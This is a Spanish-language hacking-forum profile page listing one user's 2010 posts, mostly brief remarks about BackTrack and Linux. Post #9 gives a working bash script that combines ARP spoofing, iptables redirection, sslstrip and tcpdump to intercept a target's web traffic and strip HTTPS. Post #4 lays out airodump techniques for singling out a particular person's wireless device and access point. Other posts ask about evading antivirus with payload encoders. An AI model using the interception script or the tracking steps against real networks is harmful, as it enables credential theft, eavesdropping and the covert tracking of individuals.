Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - l1vv3r

#1
Muy interesante el video.
#2
Hacking / Re: Problema con back track 4
11 Diciembre 2010, 10:20 AM
Para poder arrancar en vesa con back track, con cualquier tarjeta grafica que de problemas puedes lanzar fixvesa antes de lanzar startx.
Esto te cambia la configuracion del xorg para que funcione en vesa.

Saludos
#3
Si es tu primer acercamiento a linux te recomiendo que utilizes una maquina virtual, o que lo instales en un USB (con uno de 8 GBytes) puedes hacer una instalacion bastante funcional.
#4
Hacking / Re: [Práctica] Ataque a ciegas.
11 Diciembre 2010, 02:42 AM
Para poder identificar al AP que se conecta un equipo te recomiendo lo siguiente:
1-Cuando haces una airodump, en el listado de stations hay una columna llamada probes que es el listado de aps a las que ese station se intenta conectar de manera automatica, lo mismo con un poco de suerte, aparece alguna que logre identificarle (como un AP con el nombre de su trabajo, la de un hotel, etc.). Una vez que identifiques el station solo tienes que ver a que bssid se ha conectado.
2-Si no hay suerte puedes utilizar la tecnica de la doble ubicacion: Haz un listado de todos los stations que se encuentran conectados en tu casa, teniendo la certeza que tu objetivo esta conectado o al menos tiene el wifi encendido. Puedes sacar esa info de csv que genera el airodump. Luego necesitas una segunda ubicacion donde sapas que tu objetivo este conectado o que al menos tengo el wifi encendido. Luego macheas un listado contra otro y el que coincida es muy muy problable que sea tu objetivo (ten cuidao ya que si haces el airodump con el mismo equipo tu mac tambien coincidira en las dos ubicaciones ;)
3-La tecnica que han comentado de fabricante de mac tambien es muy interesante, la puedes aplicar sobre los datos del los stations del aerodump.
4-Otra opcion es, airodump cuando no este en la zona y capturas stations, luego cuando llegue nuevo airodump, y descartas todos los stations del primer escaneo del segundo, lo que queden es posible que sea tu objetivo. Si lo haces varios dias, al final seguro que lo identificas.

Si se me ocurre algo mas ya lo pondre.

Saludos y suerte.

#5
Gracias por la rápida respuesta.

Me pongo a mirar lo de los encoders!!! Recomiendas alguno??
#6
Detectan los antivirus de windows el payload del ejecutable?
#7
Hacking / Re: Linux BackTrack 4
16 Abril 2010, 12:29 PM
A mi la verdad es que no me gusta demasiado BackTrack. Prefiero manajer y conocer muy bien las 6 o 7 aplicaciones claves, que mal las 80.000 que trae el BackTrack.

Que trabajo da instalar el nmap, ettercap, wireshark, metasploit, aircrack-ng, dsniff,  nessus, tal vez 15 minutos? Mejor conocer una pocas pero  muy bien, que perderse en la cantidad ingente de aplicaciones del BackTrack.

#8
Interesante el Driftnet desconocia su existencia.

Gracias.
#9
Hacking / Re: Ettercap+Sslstrip
15 Abril 2010, 16:35 PM
Te dejo un script que a mi me funciona a la perfeccion en cuanto a funcionamiento de sslstrip:

#!/bin/bash

path_dir=/tmp #La ruta donde quieras guardar los resultados
file_name=sslstrip.log
file_name2=tcpdump.pcap
device=wlan0 #Modifica según el dispositivo desde donde hagas la captura.
$direccion_ip=192.168.0.12 #La IP del objetivo
$gateway=192.168.0.1 #La IP para realizar el ARP Spoofing

   echo "1" > /proc/sys/net/ipv4/ip_forward
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5555
   roxterm --tab -e sslstrip -w $path_dir/$file_name -l 5555
   roxterm --tab -e arpspoof -i $device -t $direccion_ip $gateway
   roxterm --tab -e tcpdump -nni $device -s 0 -w $path_dir/$file_name2 host $direccion_ip

Espero que te sea de utilidad
#10
Muy muy bueno. Tus 2 papers son impresionantes ..